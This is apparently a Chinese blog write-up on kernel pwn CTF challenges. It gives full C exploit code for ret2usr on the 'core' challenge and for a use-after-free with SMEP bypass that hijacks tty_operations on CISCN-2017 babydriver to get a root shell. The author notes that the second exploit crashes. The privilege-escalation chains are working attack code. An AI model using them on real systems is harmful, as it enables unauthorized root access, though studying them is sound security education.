
在上一篇文章中,我们借助一道kernel pwn的入门题——core完成了kernel ROP的学习,本系列按照与上一篇文章相同的资料的顺序继续学习与复现。本篇文章学习的漏洞技术为:ret2usr



#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/ioctl.h>unsigned long long commit_creds = 0, prepare_kernel_cred = 0; // address of to key function
const unsigned long long commit_creds_base = 0xFFFFFFFF8109C8E0;const unsigned long long swapgs_popfq_ret = 0xffffffff81a012da;
const unsigned long long iretq = 0xFFFFFFFF81A00987;int fd = 0;   // file pointer of process 'core'void saveStatus();
void get_function_address();
void core_read(char* buf);
void change_off(int off);
void core_copy_func(unsigned long long nbytes);
void print_binary(char* buf, int length);
void rise_cred();
void shell();size_t user_cs, user_ss, user_rflags, user_sp;
void saveStatus(){__asm__("mov user_cs, cs;""mov user_ss, ss;""mov user_sp, rsp;""pushf;""pop user_rflags;");puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}void core_read(char* buf){ioctl(fd, 0x6677889B, buf);
}void change_off(int off){ioctl(fd, 0x6677889C, off);
}void core_copy_func(unsigned long long nbytes){ioctl(fd, 0x6677889A, nbytes);
}// This function is used to get the addresses of two key functions from /tmp/kallsyms
void get_function_address(){FILE* sym_table = fopen("/tmp/kallsyms", "r"); // including all address of kernel functionsif(sym_table == NULL){printf("\033[31m\033[1m[x] Error: Cannot open file \"/tmp/kallsyms\"\n\033[0m");exit(1);}unsigned long long addr = 0;char type[0x10];char func_name[0x100];// when the reading raises error, the function fscanf will return a zero, so that we know the file comes to its end.while(fscanf(sym_table, "%llx%s%s", &addr, type, func_name)){if(commit_creds && prepare_kernel_cred)      // two addresses of key functions are all found, return directly.return;if(!strcmp(func_name, "commit_creds")){       // function "commit_creds" foundcommit_creds = addr;printf("\033[32m\033[1m[+] Note: Address of function \"commit_creds\" found: \033[0m%#llx\n", commit_creds);}else if(!strcmp(func_name, "prepare_kernel_cred")){prepare_kernel_cred = addr;printf("\033[32m\033[1m[+] Note: Address of function \"prepare_kernel_cred\" found: \033[0m%#llx\n", prepare_kernel_cred);}}
}// this is a universal function to print binary data from a char* array
void print_binary(char* buf, int length){int index = 0;char output_buffer[80];memset(output_buffer, '\0', 80);memset(output_buffer, ' ', 0x10);for(int i=0; i<(length % 16 == 0 ? length / 16 : length / 16 + 1); i++){char temp_buffer[0x10];memset(temp_buffer, '\0', 0x10);sprintf(temp_buffer, "%#5x", index);strcpy(output_buffer, temp_buffer);output_buffer[5] = ' ';output_buffer[6] = '|';output_buffer[7] = ' ';for(int j=0; j<16; j++){if(index+j >= length)sprintf(output_buffer+8+3*j, "   ");else{sprintf(output_buffer+8+3*j, "%02x ", ((int)buf[index+j]) & 0xFF);if(!isprint(buf[index+j]))output_buffer[58+j] = '.';elseoutput_buffer[58+j] = buf[index+j];}}output_buffer[55] = ' ';output_buffer[56] = '|';output_buffer[57] = ' ';printf("%s\n", output_buffer);memset(output_buffer+58, '\0', 16);index += 16;}
}void rise_cred(){// define two function pointervoid* (*prepare_kernel_credp)(void*) = prepare_kernel_cred;int (*commit_credsp)(void*) = commit_creds;commit_credsp(prepare_kernel_credp(NULL));
}void shell(){if(getuid()){printf("\033[31m\033[1m[x] Error: Failed to get root, exiting......\n\033[0m");exit(1);}printf("\033[32m\033[1m[+] Getting the root......\033[0m\n");system("/bin/sh");exit(0);
}int main(){saveStatus();fd = open("/proc/core", 2);     // open the processif(!fd){printf("\033[31m\033[1m[x] Error: Cannot open process \"core\"\n\033[0m");exit(1);}char buffer[0x100] = {0};get_function_address();     // get addresses of two key functionunsigned long long base_offset = commit_creds - commit_creds_base;printf("\033[34m\033[1m[*] KASLR offset: \033[0m%#llx\n", base_offset);change_off(0x40);           // change the offset so that we can get canary latercore_read(buffer);          // get canaryprintf("\033[34m\033[1m[*] Contents in buffer here:\033[0m\n");  // print content in bufferprint_binary(buffer, 0x40);unsigned long long canary = ((size_t*)&buffer)[0];printf("\033[35m\033[1m[*] The value of canary is the first 8 bytes: \033[0m%#llx\n", canary);size_t ROP[100] = {0};memset(ROP, 0, 800);int idx = 0;for(int i=0; i<10; i++)ROP[idx++] = canary;ROP[idx++] = (unsigned long long)rise_cred;ROP[idx++] = swapgs_popfq_ret + base_offset;  // step 1 of returning to user mode: swapgsROP[idx++] = 0;ROP[idx++] = iretq + base_offset;              // step 2 of returning to user mode: iretq// after the iretq: return address, user cs, user rflags, user sp, user ssROP[idx++] = (unsigned long long)shell;ROP[idx++] = user_cs;ROP[idx++] = user_rflags;ROP[idx++] = user_sp;ROP[idx++] = user_ss;printf("\033[34m\033[1m[*] Our rop chain looks like: \033[0m\n");print_binary((char*)ROP, 0x100);write(fd, ROP, 0x800);core_copy_func(0xffffffffffff0100);return 0;

Kernel Use After Free & SMAP/SMEP bypass

与用户态类似,内核中也可以利用UAF漏洞,但内存分配的方式完全不同。本漏洞利用使用另一道经典Kernel Pwn入门例题——CISCN-2017 babydriver。同时本题还需要进行SMAP/SMEP的绕过,使我们能够ret2usr。

# SPDX-License-Identifier: GPL-2.0-only
# ----------------------------------------------------------------------
# extract-vmlinux - Extract uncompressed vmlinux from a kernel image
# Inspired from extract-ikconfig
# (c) 2009,2010 Dick Streefland <>
# (c) 2011      Corentin Chary <>
# ----------------------------------------------------------------------check_vmlinux()
{# Use readelf to check if it's a valid ELF# TODO: find a better to way to check that it's really vmlinux#       and not just an elfreadelf -h $1 > /dev/null 2>&1 || return 1cat $1exit 0
{# The obscure use of the "tr" filter is to work around older versions of# "grep" that report the byte offset of the line instead of the pattern.# Try to find the header ($1) and decompress from herefor  pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`dopos=${pos%%:*}tail -c+$pos "$img" | $3 > $tmp 2> /dev/nullcheck_vmlinux $tmpdone
}# Check invocation:
if  [ $# -ne 1 -o ! -s "$img" ]
thenecho "Usage: $me <kernel-image>" >&2exit 2
fi# Prepare temp files:
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0# That didn't work, so retry after decompression.
try_decompress '\037\213\010' xy    gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh'          xy    bunzip2
try_decompress '\135\0\0\0'   xxx   unlzma
try_decompress '\211\114\132' xy    'lzop -d'
try_decompress '\002!L\030'   xxx   'lz4 -d'
try_decompress '(\265/\375'   xxx   unzstd# Finally check for uncompressed images or objects:
check_vmlinux $img# Bail out:
echo "$me: Cannot find vmlinux." >&2

使用方法:./extract_vmlinux bzImage > vmlinux

Step 1: 读取/proc/kallsyms获取内核函数地址




Step 2: 绕过SMAP/SMEP





调试方法:首先打开内核,之后在另一个终端输入gdb vmlinux,输入target remote localhost:1234即可attach到1234端口进行内核调试。

在上图中,我们刚刚引导内核执行了mov rax,cr4指令(直接输入reg cr4是无法显示cr4寄存器的值的),可以看到cr4的值为0x1006f0,其中最高位的1代表SMEP保护开启。因此我们只需要将cr4的值改为0x6f0就能关闭保护。


 unsigned long long rop[20];int idx = 0;rop[idx++] = poprdi_ret;         // mov rdi, 6f0hrop[idx++] = 0x6f0;rop[idx++] = movcr4rdi_poprbp_ret; // close SMEProp[idx++] = 0;                     // for pop rbprop[idx++] = rise_cred;rop[idx++] = swapgs_poprbp_ret;      // ready to return to user moderop[idx++] = 0;rop[idx++] = iretq;rop[idx++] = shell;rop[idx++] = user_cs;rop[idx++] = user_rflags;rop[idx++] = user_sp;rop[idx++] = user_ss;

Step 3: UAF



static __always_inline __alloc_size(3) void *kmem_cache_alloc_trace(struct kmem_cache *s,gfp_t flags, size_t size)
{void *ret = kmem_cache_alloc(s, flags);ret = kasan_kmalloc(s, ret, size, flags);return ret;






在 /dev 下有一个伪终端设备 ptmx ,在我们打开这个设备时内核中会创建一个 tty_struct 结构体,与其他类型设备相同,tty驱动设备中同样存在着一个存放着函数指针的结构体 tty_operations
那么我们不难想到的是我们可以通过 UAF 劫持 /dev/ptmx 这个设备的 tty_struct 结构体与其内部的 tty_operations 函数表,那么在我们对这个设备进行相应操作(如write、ioctl)时便会执行我们布置好的恶意函数指针


struct tty_struct {int   magic;struct kref kref;struct device *dev;struct tty_driver *driver;const struct tty_operations *ops;int index;/* Protects ldisc changes: Lock tty not pty */struct ld_semaphore ldisc_sem;struct tty_ldisc *ldisc;struct mutex atomic_write_lock;struct mutex legacy_mutex;struct mutex throttle_mutex;struct rw_semaphore termios_rwsem;struct mutex winsize_mutex;spinlock_t ctrl_lock;spinlock_t flow_lock;/* Termios values are protected by the termios rwsem */struct ktermios termios, termios_locked;struct termiox *termiox;  /* May be NULL for unsupported */char name[64];struct pid *pgrp;        /* Protected by ctrl lock */struct pid *session;unsigned long flags;int count;struct winsize winsize;       /* winsize_mutex */unsigned long stopped:1, /* flow_lock */flow_stopped:1,unused:BITS_PER_LONG - 2;int hw_stopped;unsigned long ctrl_status:8,  /* ctrl_lock */packet:1,unused_ctrl:BITS_PER_LONG - 9;unsigned int receive_room;    /* Bytes free for queue */int flow_change;struct tty_struct *link;struct fasync_struct *fasync;int alt_speed;       /* For magic substitution of 38400 bps */wait_queue_head_t write_wait;wait_queue_head_t read_wait;struct work_struct hangup_work;void *disc_data;void *driver_data;struct list_head tty_files;#define N_TTY_BUF_SIZE 4096int closing;unsigned char *write_buf;int write_cnt;/* If the tty has a pending do_SAK, queue it here - akpm */struct work_struct SAK_work;struct tty_port *port;


struct kref {atomic_t refcount;
};typedef struct {int counter;
} atomic_t;


发现有rax指向tty_operations。这是我们在内核中唯一可以控制的地址,因此思路是以其为跳板进行栈迁移以触发ROP。这就需要mov rsp, rax的gadget了。


struct tty_operations {struct tty_struct * (*lookup)(struct tty_driver *driver,struct inode *inode, int idx);int  (*install)(struct tty_driver *driver, struct tty_struct *tty);void (*remove)(struct tty_driver *driver, struct tty_struct *tty);int  (*open)(struct tty_struct * tty, struct file * filp);void (*close)(struct tty_struct * tty, struct file * filp);void (*shutdown)(struct tty_struct *tty);void (*cleanup)(struct tty_struct *tty);int  (*write)(struct tty_struct * tty,const unsigned char *buf, int count);int  (*put_char)(struct tty_struct *tty, unsigned char ch);void (*flush_chars)(struct tty_struct *tty);int  (*write_room)(struct tty_struct *tty);int  (*chars_in_buffer)(struct tty_struct *tty);int  (*ioctl)(struct tty_struct *tty,unsigned int cmd, unsigned long arg);long (*compat_ioctl)(struct tty_struct *tty,unsigned int cmd, unsigned long arg);void (*set_termios)(struct tty_struct *tty, struct ktermios * old);void (*throttle)(struct tty_struct * tty);void (*unthrottle)(struct tty_struct * tty);void (*stop)(struct tty_struct *tty);void (*start)(struct tty_struct *tty);void (*hangup)(struct tty_struct *tty);int (*break_ctl)(struct tty_struct *tty, int state);void (*flush_buffer)(struct tty_struct *tty);void (*set_ldisc)(struct tty_struct *tty);void (*wait_until_sent)(struct tty_struct *tty, int timeout);void (*send_xchar)(struct tty_struct *tty, char ch);int (*tiocmget)(struct tty_struct *tty);int (*tiocmset)(struct tty_struct *tty,unsigned int set, unsigned int clear);int (*resize)(struct tty_struct *tty, struct winsize *ws);int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);int (*get_icount)(struct tty_struct *tty,struct serial_icounter_struct *icount);
#ifdef CONFIG_CONSOLE_POLLint (*poll_init)(struct tty_driver *driver, int line, char *options);int (*poll_get_char)(struct tty_driver *driver, int line);void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endifconst struct file_operations *proc_fops;

可以看到其中write的函数指针应该在索引为7的位置。因此我们将这里修改为mov rsp, rax的指针。这里,原资料巧妙构造了tty_operations的结构使得其能成功触发ROP。

    size_t fake_op[0x30];for(int i = 0; i < 0x10; i++)fake_op[i] = MOV_RSP_RAX_DEC_EBX_RET;fake_op[0] = POP_RAX_RET;fake_op[1] = rop;

首先,使用write函数触发栈迁移,此时栈应该在fake_op的头部位置。之后ret到pop rax ; ret的gadget,将rax赋值为事先构造好的ROP链,然后ret。**注意:ret后面又是一个mov rsp, rax,这就使得rsp自然地被迁移到了ROP上。**至此,一切顺理成章地完成了。

笔者无比欣喜地开始测试,想看到那个梦寐以求的’#'出现,但是kernel却甩给我一堆报错信息,1s之内难以截屏,但大致说的是:unable to handle kernel paging request。


[+] Congratulations! root got......
[    4.253787] traps: uaf.o[90] general protection ip:4110a2 sp:7ffd42a4da38 error:0 in uaf.o[401000+96000]
[    4.255947] device release
[    4.256551] bad magic number for tty struct (5:2) in tty_release
Segmentation fault


更奇妙的是,当我在此基础上添加几个printf时,居然又出现了kernel panic错误。推测是编译器问题,暂时无法解决(ノへ ̄、),但是原理算是全部清楚了。


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/ioctl.h>const unsigned long long commit_creds = 0xffffffff810a1420, prepare_kernel_cred = 0xffffffff810a1810;
#define movcr4rdi_poprbp_ret 0xffffffff81004d80 // need to move 0x6f0 to cr4
#define swapgs_poprbp_ret 0xffffffff81063694
#define iretq 0xffffffff8181a797
#define poprdi_ret 0xffffffff810d238d
#define movrsprax_decebx_ret 0xffffffff8181bfc5
#define poprax_ret 0xffffffff8100ce6eunsigned long long fake_tty_operations[30];void saveStatus();
void print_binary(char* buf, int length);
void rise_cred();
void shell();size_t user_cs, user_ss, user_rflags, user_sp;
void saveStatus(){__asm__("mov user_cs, cs;""mov user_ss, ss;""mov user_sp, rsp;""pushf;""pop user_rflags;");puts("\033[34m\033[1m[*] Status has been saved.\n\033[0m");
}// this is a universal function to print binary data from a char* array
void print_binary(char* buf, int length){printf("---------------------------------------------------------------------------\n");printf("Address info starting in %p:\n", buf);int index = 0;char output_buffer[80];memset(output_buffer, '\0', 80);memset(output_buffer, ' ', 0x10);for(int i=0; i<(length % 16 == 0 ? length / 16 : length / 16 + 1); i++){char temp_buffer[0x10];memset(temp_buffer, '\0', 0x10);sprintf(temp_buffer, "%#5x", index);strcpy(output_buffer, temp_buffer);output_buffer[5] = ' ';output_buffer[6] = '|';output_buffer[7] = ' ';for(int j=0; j<16; j++){if(index+j >= length)sprintf(output_buffer+8+3*j, "   ");else{sprintf(output_buffer+8+3*j, "%02x ", ((int)buf[index+j]) & 0xFF);if(!isprint(buf[index+j]))output_buffer[58+j] = '.';elseoutput_buffer[58+j] = buf[index+j];}}output_buffer[55] = ' ';output_buffer[56] = '|';output_buffer[57] = ' ';printf("%s\n", output_buffer);memset(output_buffer+58, '\0', 16);index += 16;}printf("---------------------------------------------------------------------------\n");
}void rise_cred(){// define two function pointer// printf("\033[32m\033[1m[+] Ready to execute commit_creds(prepare_kernel_cred(NULL))......\033[0m\n");void* (*prepare_kernel_credp)(void*) = prepare_kernel_cred;int (*commit_credsp)(void*) = commit_creds;(*commit_credsp)((*prepare_kernel_credp)(NULL));// printf("\033[32m\033[1m[+] commit_creds(prepare_kernel_cred(NULL)) executed.\033[0m\n");
}void shell(){// if(getuid()){//    printf("\033[31m\033[1m[x] Error: Failed to get root, exiting......\n\033[0m");//     exit(1);// }// printf("\033[32m\033[1m[+] Congratulations! root got......\033[0m\n");system("/bin/sh");exit(0);
}int main(){saveStatus();unsigned long long rop[0x20] = {0};int idx = 0;rop[idx++] = poprdi_ret;           // mov rdi, 6f0hrop[idx++] = 0x6f0;rop[idx++] = movcr4rdi_poprbp_ret; // close SMEProp[idx++] = 0;                     // for pop rbprop[idx++] = rise_cred;rop[idx++] = swapgs_poprbp_ret;      // ready to return to user moderop[idx++] = 0;rop[idx++] = 0xffffffff814e35ef;rop[idx++] = shell;rop[idx++] = user_cs;rop[idx++] = user_rflags;rop[idx++] = user_sp;rop[idx++] = user_ss;unsigned long long fake_tty_struct[0x20];for(int i=0; i<0x10; i++)fake_tty_operations[i] = movrsprax_decebx_ret;fake_tty_operations[0] = poprax_ret;fake_tty_operations[1] = (unsigned long long)rop;int f1 = open("/dev/babydev", 2);int f2 = open("/dev/babydev", 2);ioctl(f1, 0x10001, 0x2e0);close(f1);int f3 = open("/dev/ptmx", 2|O_NOCTTY);read(f2, fake_tty_struct, 0x20);fake_tty_struct[3] = (unsigned long long)fake_tty_operations;        // change the tty_operations pointer to our fake pointerchar buf[0x8] = {0};write(f2, fake_tty_struct, 0x20);write(f3, buf, 8);return 0;

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